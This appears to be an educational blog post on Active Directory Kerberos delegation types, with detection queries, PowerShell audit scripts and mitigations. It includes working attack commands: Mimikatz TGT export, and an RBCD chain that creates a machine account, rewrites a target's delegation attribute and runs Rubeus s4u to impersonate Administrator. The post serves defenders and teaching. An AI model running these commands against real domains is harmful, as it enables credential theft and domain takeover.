Active Directory Delegation

🔥 Active Directory Delegation Explained (With Attacks & Exploits) 🔥

Delegation is a Kerberos feature that lets a service authenticate to other services on behalf of a user (impersonation). It exists to make multi-tier Single Sign-On (SSO) work in AD, for example a web front end reaching a database as the logged-on user. When delegation is misconfigured, it becomes a path to privilege escalation and full domain takeover. 😈


💡 Types of Delegation (3 Types)

AD has three types of delegation:

1️⃣ Unconstrained Delegation (🚨 Most Dangerous)

What is it?

  • When a host has Unconstrained Delegation enabled, every user who authenticates to a service on it hands over a copy of their Kerberos TGT: the KDC embeds the forwarded TGT in the service ticket, and the host caches it in LSASS so it can authenticate anywhere as that user.

  • If an attacker gets SYSTEM on such a host, they can extract every cached TGT, including a Domain Admin's if one has connected, and use it for full domain compromise!

How to check?

```powershell
# UF_TRUSTED_FOR_DELEGATION = 0x80000 (524288); matches both user and computer accounts
Get-ADObject -Filter {userAccountControl -band 0x80000} -Properties Name, userAccountControl | Select-Object Name, ObjectClass
```

👉 Every account returned has Unconstrained Delegation enabled. Domain controllers always appear here because they have it by default and need it; anything else in the list is a finding.

Exploitation (Attack Example): If the attacker gets SYSTEM access on a machine with Unconstrained Delegation enabled, they can export the cached TGTs with Mimikatz:

```powershell
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"
```

👉 If a Domain Admin's TGT is among the exported .kirbi files, it can be injected (kerberos::ptt) and the domain is fully compromised! 🚀 The catch is that a DA ticket is only there if a DA has authenticated to that host since it booted; in practice attackers either wait on the host for a privileged logon or coerce a privileged machine account such as a DC into authenticating to it, and a DC's TGT is enough for DCSync.

Mitigation: ❌ Remove Unconstrained Delegation from every non-DC host (move the few services that truly need delegation to Constrained Delegation or RBCD). ✅ Put privileged accounts in the Protected Users group and/or set "Account is sensitive and cannot be delegated" so their tickets are never forwardable. ✅ Never let Domain Admins log on to member servers, and treat any new non-DC host with this flag as an incident (DCs have it by design, so the flag cannot simply be "disabled" there).


2️⃣ Constrained Delegation (More Secure but Still Exploitable)

What is it?

  • Constrained Delegation restricts which services the account may delegate to: the allowed target SPNs are listed in the account's msDS-AllowedToDelegateTo attribute.

  • There are two flavours. "Kerberos only" requires the user to actually authenticate to the front-end service with Kerberos first; "Use any authentication protocol" (protocol transition, the TRUSTED_TO_AUTH_FOR_DELEGATION flag) lets the service obtain a ticket for any user on its own via S4U2Self, which is the dangerous one.

How to check?

```powershell
Get-ADObject -LDAPFilter "(msDS-AllowedToDelegateTo=*)" -Properties msDS-AllowedToDelegateTo, userAccountControl
```

👉 This returns every account with Constrained Delegation enabled together with the SPNs it may delegate to.

Exploitation (Attack Example): If an attacker compromises an account that has Constrained Delegation (its password or NTLM hash), the first step is to see which services it may delegate to and whether protocol transition is on:

```powershell
Get-ADUser -Identity <USERNAME> -Properties msDS-AllowedToDelegateTo, userAccountControl |
    Select-Object Name, msDS-AllowedToDelegateTo, userAccountControl
```

🚀 With protocol transition enabled, the attacker asks the KDC for a ticket to those SPNs as any user who is not protected from delegation (S4U2Self followed by S4U2Proxy, which is what Rubeus s4u automates). The service name in the returned ticket is not protected by the KDC, so a ticket obtained for cifs/SERVER can be rewritten as ldap/SERVER or host/SERVER: lateral movement to that host, or DCSync if a domain controller is in the list.

Mitigation: Allow delegation only to the specific services that need it, and prefer "Kerberos only" over protocol transition. Monitor which accounts have delegation enabled and which target SPNs they list (a domain controller in the list is a red flag). Keep strong, rotated passwords on accounts with Constrained Delegation, because Kerberoasting a weak one hands the attacker the delegation right.
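The two checks above, as an added example that is not code from the original post: one pass over the domain that lists unconstrained and constrained delegation together, skips the domain controllers that are expected to have it, flags protocol transition and target SPNs that point at a DC, and finally lists the Domain Admins whose tickets can still be delegated. It assumes the RSAT ActiveDirectory module on a domain-joined host with read access to AD; the group, flag and attribute names are the standard AD ones.

```powershell
# Added example (not from the original post). Requires the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

$UF_TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained delegation
$UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition ("use any authentication protocol")
$UF_NOT_DELEGATED                  = 0x100000   # "Account is sensitive and cannot be delegated"

# Domain controllers carry unconstrained delegation by design; exclude them from findings.
$dcHosts = @((Get-ADDomainController -Filter *).Name)

# One LDAP query for both types: bitwise-AND matching rule on userAccountControl
# (524288 = 0x80000) OR a populated msDS-AllowedToDelegateTo.
$ldap = '(|(userAccountControl:1.2.840.113556.1.4.803:=524288)(msDS-AllowedToDelegateTo=*))'

function Get-DelegationFindings {
    Get-ADObject -LDAPFilter $ldap -Properties userAccountControl, 'msDS-AllowedToDelegateTo' | ForEach-Object {
        $obj  = $_
        $uac  = [int]$obj.userAccountControl
        $unc  = ($uac -band $UF_TRUSTED_FOR_DELEGATION) -ne 0
        $pt   = ($uac -band $UF_TRUSTED_TO_AUTH_FOR_DELEGATION) -ne 0
        $spns = @($obj.'msDS-AllowedToDelegateTo' | Where-Object { $_ })

        if ($unc -and $obj.ObjectClass -eq 'computer' -and $dcHosts -contains $obj.Name) { return }

        # A target SPN on a domain controller (e.g. ldap/DC01) turns constrained
        # delegation into a DCSync path, so call it out explicitly.
        $onDc = @($spns | Where-Object {
            $h = (($_ -split '/')[1] -split '[:.]')[0]
            $dcHosts -contains $h
        })

        $type = if ($unc) { 'Unconstrained' }
                elseif ($pt) { 'Constrained (protocol transition)' }
                else { 'Constrained (Kerberos only)' }

        [pscustomobject]@{
            Name        = $obj.Name
            ObjectClass = $obj.ObjectClass
            Type        = $type
            Targets     = ($spns -join '; ')
            TargetsDC   = ($onDc.Count -gt 0)
        }
    }
}

function Get-UnprotectedAdmins {
    # Protected Users exists on 2012 R2+ domains; a missing group means nobody is protected.
    $protected = @(Get-ADGroupMember 'Protected Users' -Recursive -ErrorAction SilentlyContinue |
                   Select-Object -ExpandProperty DistinguishedName)
    Get-ADGroupMember 'Domain Admins' -Recursive |
        Where-Object objectClass -eq 'user' |
        Get-ADUser -Properties userAccountControl |
        Where-Object {
            (($_.userAccountControl -band $UF_NOT_DELEGATED) -eq 0) -and
            ($protected -notcontains $_.DistinguishedName)
        } |
        Select-Object SamAccountName, DistinguishedName
}

Get-DelegationFindings | Sort-Object Type, Name | Format-Table -AutoSize
"Domain Admins whose tickets can still be delegated (not in Protected Users, not marked sensitive):"
Get-UnprotectedAdmins | Format-Table -AutoSize
```

Anything with Type "Unconstrained" that is not a DC, any row with TargetsDC set to True, and any account in the second list is a finding to fix before an attacker finds it.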


3️⃣ Resource-Based Constrained Delegation (RBCD) (Modern & Exploitable)

What is it?

  • RBCD is the modern form of Constrained Delegation in which the destination (the resource) decides who may authenticate to it on behalf of users, instead of the front-end service listing its targets.

  • The resource (e.g. a file server or SQL server) stores the allowed principals as a security descriptor in its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, so whoever can write that attribute on a computer object controls delegation to that host.

How to check?

```powershell
Get-ADComputer -LDAPFilter "(msDS-AllowedToActOnBehalfOfOtherIdentity=*)" -Properties PrincipalsAllowedToDelegateToAccount |
    Select-Object Name, PrincipalsAllowedToDelegateToAccount
```

👉 Every machine returned has RBCD configured; the second column shows who is allowed to delegate to it.

Exploitation (RBCD Attack): The attacker needs two things: a principal whose credentials they control (a machine account they create themselves is enough) and write access to the target computer object (GenericWrite, WriteDACL, ownership or an explicit write right on the attribute, typically found with BloodHound or PowerView). With those they make the target trust them for delegation and then impersonate any unprotected user to it.

🚀 Step 1: Create a machine account (any domain user can while ms-DS-MachineAccountQuota is above 0, and the default is 10):

```powershell
New-ADComputer -Name "AttackerMachine" -SamAccountName 'AttackerMachine$' `
    -AccountPassword (ConvertTo-SecureString 'AttackerPass123!' -AsPlainText -Force) -Enabled $true
```

🚀 Step 2: Write the attacker's account into the target's msDS-AllowedToActOnBehalfOfOtherIdentity (this is the step that requires write access on VictimServer):

```powershell
Set-ADComputer -Identity "VictimServer" -PrincipalsAllowedToDelegateToAccount (Get-ADComputer "AttackerMachine")
```

🚀 Step 3: Use the machine account to request a service ticket to VictimServer as a privileged user (S4U2Self followed by S4U2Proxy) and inject it into the current session:

```powershell
# <RC4_HASH> is the NTLM hash of the password chosen in Step 1
Rubeus.exe s4u /user:AttackerMachine$ /rc4:<RC4_HASH> /impersonateuser:Administrator /msdsspn:cifs/VictimServer /ptt
```

🔥 Boom! The attacker now holds a ticket for VictimServer as Administrator and has taken over the host, provided that account is not in Protected Users or marked as sensitive.

Mitigation: Set ms-DS-MachineAccountQuota to 0 so ordinary users cannot create machine accounts. Audit who holds write rights on computer objects (that is the real prerequisite of the attack) and alert on changes to msDS-AllowedToActOnBehalfOfOtherIdentity (Directory Service Changes auditing, Event ID 5136). Configure RBCD only for the specific services that need it, and keep privileged accounts in Protected Users so they cannot be impersonated.
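The RBCD check and mitigation above, as an added example that is not code from the original post: for one computer object it decodes the security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity trustee by trustee (resolving by SID so a deleted attacker machine account still shows up as an orphaned SID), reads ms-DS-MachineAccountQuota, and scans the object's ACL for non-admin principals holding the rights that let Step 2 of the attack happen. It assumes the RSAT ActiveDirectory module (which also provides the AD: drive); 'VictimServer' is a placeholder host name, and the list of expected admin principals is an assumption you may need to extend for your domain.

```powershell
# Added example (not from the original post). Requires the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

# schemaIDGUID of msDS-AllowedToActOnBehalfOfOtherIdentity, looked up from the schema so the
# ACE check below does not depend on a hard-coded GUID.
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$rbcdAttr = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=msDS-AllowedToActOnBehalfOfOtherIdentity)' -Properties schemaIDGUID
$rbcdGuid = [System.Guid]::new([byte[]]$rbcdAttr.schemaIDGUID)
$allProps = [guid]'00000000-0000-0000-0000-000000000000'   # ObjectType meaning "all properties"

function Get-RbcdTrustees {
    param([Parameter(Mandatory)][string]$ComputerName)
    $c  = Get-ADComputer -Identity $ComputerName -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    $sd = $c.'msDS-AllowedToActOnBehalfOfOtherIdentity'
    if (-not $sd) { return @() }
    # The attribute is a security descriptor; the trustee of each access rule is a principal
    # allowed to act on behalf of other identities against this host.
    foreach ($ace in $sd.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        $sid = $ace.IdentityReference.Value
        $obj = Get-ADObject -Filter { objectSid -eq $sid } -ErrorAction SilentlyContinue
        $who = if ($obj) { $obj.Name } else { '<orphaned SID>' }
        [pscustomobject]@{ Target = $c.Name; Sid = $sid; Trustee = $who; Rights = $ace.ActiveDirectoryRights }
    }
}

function Get-MachineAccountQuota {
    $dn = (Get-ADDomain).DistinguishedName
    (Get-ADObject -Identity $dn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
}

function Get-RbcdWriters {
    param([Parameter(Mandatory)][string]$ComputerName)
    $c   = Get-ADComputer -Identity $ComputerName
    $acl = Get-Acl -Path ("AD:\" + $c.DistinguishedName)
    # Principals expected to hold broad rights on computer objects (assumption; extend for your domain).
    $expected = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', '\Domain Admins', '\Enterprise Admins'
    # Rights that allow rewriting msDS-AllowedToActOnBehalfOfOtherIdentity or taking over the object.
    $takeover = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll, GenericWrite, WriteDacl, WriteOwner'
    $writeProp = [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $id = $ace.IdentityReference.Value
        if ($expected | Where-Object { $id -like "*$_" }) { continue }
        $broad = [int]($ace.ActiveDirectoryRights -band $takeover) -ne 0
        $prop  = ([int]($ace.ActiveDirectoryRights -band $writeProp) -ne 0) -and
                 ($ace.ObjectType -eq $rbcdGuid -or $ace.ObjectType -eq $allProps)
        if ($broad -or $prop) {
            [pscustomobject]@{ Target = $c.Name; Principal = $id; Rights = $ace.ActiveDirectoryRights; ObjectType = $ace.ObjectType }
        }
    }
}

"ms-DS-MachineAccountQuota = $(Get-MachineAccountQuota)  (0 is the hardened value)"
Get-RbcdTrustees -ComputerName 'VictimServer' | Format-Table -AutoSize
Get-RbcdWriters  -ComputerName 'VictimServer' | Format-Table -AutoSize
```

A non-zero quota plus any unexpected principal in the Get-RbcdWriters output is exactly the combination the attack procedure above relies on; an orphaned SID among the trustees usually means a previous attacker machine account has already been created and deleted.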


🛡 Delegation Attacks vs. Kerberoasting

Feature      | Delegation Attacks                          | Kerberoasting
-------------|---------------------------------------------|---------------------------------------------------------
Purpose      | Abuse of authentication delegation          | Obtain service tickets encrypted with a service account's key and crack them offline
Attack Type  | Privilege escalation / lateral movement     | Offline password cracking
Requirement  | Delegation-enabled account                  | SPN-enabled account
Target       | Services with delegation enabled            | Service accounts with weak passwords
Tools Used   | Rubeus, Mimikatz, PowerView                 | GetUserSPNs.py, Hashcat
Risk Level   | 🚨 High (domain takeover possible)           | ⚠ Medium (depends on password strength)


🔥 Final Thoughts

✅ Unconstrained Delegation is the riskiest, because a host that has it caches the TGT of every user who connects, Domain Admins included. ✅ RBCD exploitation is more involved, but it is a staple of real-world lateral movement because write access to a single computer object is enough. ✅ Constrained Delegation is better, yet still attackable when protocol transition is enabled or the delegating account is compromised. Monitoring and mitigation are essential to detect delegation-based attacks.